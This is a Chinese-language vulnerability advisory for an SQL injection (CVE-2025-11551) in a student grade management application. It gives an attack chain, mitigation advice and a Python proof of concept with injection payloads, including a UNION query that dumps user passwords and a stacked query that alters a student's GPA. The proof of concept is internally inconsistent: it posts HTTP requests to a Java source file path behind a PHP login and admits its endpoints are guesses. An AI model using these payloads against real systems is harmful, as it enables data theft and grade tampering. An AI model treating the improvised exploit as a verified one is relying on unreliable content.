CVE-2025-11551：Student Result Manager SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11551

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Student Result Manager

漏洞概述

CVE-2025-11551是code-projects Student Result Manager 1.0版本中存在的一个SQL注入漏洞。该漏洞位于src/students/Database.java文件中，涉及对参数roll、name和gpa的操作未进行充分的输入验证和参数化处理，导致攻击者可以通过构造恶意SQL语句注入到后端数据库查询中。该漏洞可被远程利用，攻击者无需用户交互即可发起攻击，仅需要低权限认证即可执行。CVSS 3.1评分为6.3，属于中危级别，对机密性、完整性和可用性均产生低程度影响。该漏洞的利用方式已公开披露，可能被恶意攻击者利用。Student Result Manager是一款用于管理学生成绩的应用程序，广泛应用于教育机构，因此该漏洞可能对学校和教育组织的数据安全构成威胁。攻击者可以利用此漏洞读取、修改或删除数据库中的敏感学生信息，包括成绩数据和个人身份信息。由于漏洞利用代码已公开，建议相关用户尽快采取防护措施。

技术细节

该漏洞的根本原因在于src/students/Database.java文件中对用户输入参数（roll、name、gpa）未进行适当的过滤和参数化处理，直接将用户可控的输入拼接到SQL查询语句中。具体而言，当应用程序处理学生信息相关的数据库操作时，未使用PreparedStatement等安全的数据库访问方式，而是采用了字符串拼接的方式构造SQL语句，导致SQL注入漏洞的产生。

攻击者可以通过在roll、name或gpa参数中注入恶意SQL片段（如' OR '1'='1' --、UNION SELECT等）来绕过正常的查询逻辑。攻击者可以利用此漏洞执行以下操作：1）通过UNION查询读取数据库中的其他表数据；2）通过布尔盲注或时间盲注技术提取敏感信息；3）通过堆叠查询执行INSERT、UPDATE、DELETE等修改操作；4）在某些数据库配置下，可能实现远程代码执行。

由于漏洞的利用需要低权限认证（PR:L），攻击者首先需要获取应用程序的有效账户，然后通过正常的API接口提交包含恶意SQL负载的请求即可触发漏洞。该漏洞的攻击复杂度较低（AC:L），且不需要用户交互（UI:N），使得自动化攻击成为可能。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过公开渠道获取Student Result Manager 1.0的部署信息，识别目标系统的网络位置和可访问的接口端点。

STEP 2

步骤2：获取低权限凭证

由于漏洞利用需要低权限认证（PR:L），攻击者通过钓鱼、社会工程学或购买泄露凭证等方式获取应用程序的有效账户。

STEP 3

步骤3：构造SQL注入负载

攻击者分析src/students/Database.java的代码逻辑，针对roll、name或gpa参数构造恶意SQL注入负载，如UNION查询、布尔盲注或时间盲注语句。

STEP 4

步骤4：发送恶意请求

攻击者通过认证会话向目标服务器发送包含恶意SQL负载的HTTP请求，触发后端数据库执行非预期的SQL语句。

STEP 5

步骤5：数据提取或篡改

服务器响应中包含注入查询的结果，攻击者可提取数据库中的敏感学生信息（成绩、个人数据），或通过堆叠查询修改/删除数据。

STEP 6

步骤6：权限提升或持久化

在某些数据库配置下，攻击者可能进一步利用数据库特性实现权限提升、写入Webshell或建立持久化访问通道。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11551 - Student Result Manager SQL Injection PoC
# Target: src/students/Database.java - parameters: roll, name, gpa

import requests

TARGET_URL = "http://target-host/student_result/"
LOGIN_URL = TARGET_URL + "login.php"
INJECT_URL = TARGET_URL + "src/students/Database.java"

# Step 1: Authenticate with low-privilege credentials
session = requests.Session()
login_data = {
    "username": "valid_user",
    "password": "valid_password"
}
session.post(LOGIN_URL, data=login_data)

# Step 2: Exploit SQL Injection via 'roll' parameter (example payloads)
# Payload 1: Boolean-based blind injection
payload_roll = "1' OR '1'='1' -- "

# Payload 2: UNION-based injection to extract data
payload_union = "1' UNION SELECT username, password, NULL FROM users -- "

# Payload 3: Time-based blind injection
payload_time = "1' AND SLEEP(5) -- "

# Payload 4: Stacked query for data modification
payload_stacked = "1'; UPDATE students SET gpa='4.0' WHERE roll='1' -- "

# Step 3: Send malicious request
inject_data = {
    "roll": payload_union,
    "name": "test' OR '1'='1",
    "gpa": "3.5' OR '1'='1"
}

response = session.post(INJECT_URL, data=inject_data)
print("Response status:", response.status_code)
print("Response body:", response.text)

# Note: Adjust endpoints and parameter names based on actual application structure
# The vulnerability exists in Database.java where roll/name/gpa parameters
# are concatenated directly into SQL queries without parameterization.

影响范围

code-projects Student Result Manager 1.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）在Web应用防火墙（WAF）中添加针对SQL注入的检测规则，重点监控包含UNION、SELECT、SLEEP等关键字的请求；2）在反向代理层面实施输入过滤，对roll、name、gpa参数进行严格的字符白名单校验，仅允许字母、数字和必要的特殊字符；3）暂时限制应用程序数据库账户的权限，禁止其执行DROP、DELETE等高危操作；4）加强日志监控，对异常的数据库查询请求进行告警；5）考虑将受影响的Student Result Manager服务暂时下线或限制访问范围，仅允许可信IP访问；6）检查数据库中是否存在异常的查询记录或数据修改痕迹，评估是否已被利用。